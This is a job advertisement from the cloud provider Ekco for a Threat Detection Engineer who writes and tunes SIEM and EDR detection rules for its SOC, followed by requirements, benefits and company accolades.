Threat Detection Engineer

About Ekco

🚀 Founded in 2016 Ekco is now one of the fastest growing cloud solution providers in Europe!

We specialise in enabling companies to progress along the path of cloud maturity, managing transformation and driving better outcomes from our clients’ existing technology investments.

☁️ In a few words, we take businesses to the cloud and back!

🌍 We have over 1000 highly talented and supportive colleagues (and counting) across a number of regional offices in the UK, Benelux, South Africa, Malaysia & Ireland.

The role 

As a Detection Engineer, your primary objective is to design, develop, test, and maintain high-fidelity threat detection content across our Managed Detection and Response (MDR) service stack. You will operationalise threat intelligence, close detection gaps, and contribute to the continuous improvement of our SOC's threat detection capability. This role is pivotal in ensuring our SOC Analysts are equipped with actionable, reliable alerts to identify and respond to cyber threats effectively.

Reporting to the Head of SOC – UK, the role of Detection Engineer will play a crucial role in developing, deploying, and maintaining the Ekco MSS detection use case library.

Key Responsibilities 

• Developing, testing, and maintaining detection logic across platforms such as Microsoft Sentinel, CrowdStrike, and Defender for Endpoint.
• Writing and tuning detection rules using languages such as Kusto Query Language (KQL), Sigma, or other relevant syntax.
• Continuously tuning and refining detection rules to reduce false positives and enhance detection efficacy.
• Conducting threat hunts and detection gap assessments based on adversary TTPs, incident reviews, and cyber threat intelligence.
• Working closely with SOC Analysts to assess detection performance and enhance rule logic based on investigation outcomes.
• Participating in red and blue team exercises to validate the effectiveness of detection coverage and controls.
• Collaborating with SIEM architects to establish and enforce best practices around data schema and detection logic implementation.
• Supporting the configuration and improvement of SOAR playbooks to aid in alert triage, enrichment, and automated response.
• Leveraging version control (e.g., Git) and CI/CD pipelines to manage and deploy detection content at scale.
• Performing validation of new or updated detection rules contributed by internal or external stakeholders.
• Documenting detection logic, including rationale, associated TTPs, and investigation guidance.
• Supporting compliance and audit efforts through accurate documentation and reporting of detection controls.
• Collaborating with Threat Intelligence, Incident Response, and Customer Success teams to align detection coverage with the threat landscape and client risk profile.

Key Requirements 

• At least 2 years' experience in a Detection Engineering, Threat Hunting, or SOC Analysis role with a focus on detection content development.
• Strong experience with SIEM platforms (e.g. Microsoft Sentinel, Falcon Next-Gen SIEM) and EDR technologies (e.g. CrowdStrike, Defender for Endpoint, SentinelOne).
• Proficiency in building detection logic using KQL, CQL, Sigma or equivalent query languages.
• A solid understanding of adversary behaviour, the cyber kill chain, and MITRE ATT&CK framework.
• Practical experience analysing logs, events, and telemetry to identify detection opportunities.
• Familiarity with CI/CD methodologies, version control (Git), and scripting languages such as Python or PowerShell.
• Strong analytical and problem-solving skills, with the ability to break down complex attack scenarios into actionable detection strategies.
• Excellent communication skills – able to clearly articulate technical detail to both technical and non-technical stakeholders.
• The ability to prioritise, adapt, and remain effective in a fast-paced, service-oriented environment.
• A proactive mindset with a commitment to continuous improvement and innovation.

Desirable

• Experience working for a Managed Security Service Provider (MSSP).
• Contributions to open-source detection repositories (e.g., Sigma).
• Background in malware analysis or reverse engineering to inform detection logic.
• Exposure to red or purple team engagements.
• Understanding of log pipelines and data engineering concepts related to security telemetry.

Benefits/Perks

• ☀️ Time off - 25 days leave + public holidays
• 🎂 x1 day Birthday leave per year
• 💰 Company Pension Scheme (employer contribution 5%) + flexible salary sacrifice
• 📞 Employee Assistance Programme (EAP) - access to dedicated mental health, emotional wellbeing and general advice
• 🏃‍♀️ EkcOlympics - a global activity for fun!
• 📚 Learning & development - Unlimited access to Pluralsight learning platform

• 🌱 A lot of responsibilities & opportunities to grow (also internationally)

Why Ekco

• ⭐️ Microsoft’s 2023 Rising Star Security Partner of the year
• 🚀 VMware & Veeam top partner status
• 🏅 Ranked as 4th fastest growing technology company in the Deloitte Fast50 Awards
• 🌈Ekco are committed to cultivating an environment that promotes diversity, equality, inclusion and belonging
• 🎉 We recognise the value of internal mobility and encourage opportunities for internal development & progression
• ✨ Flexible working with a family friendly focus are at the core of our company values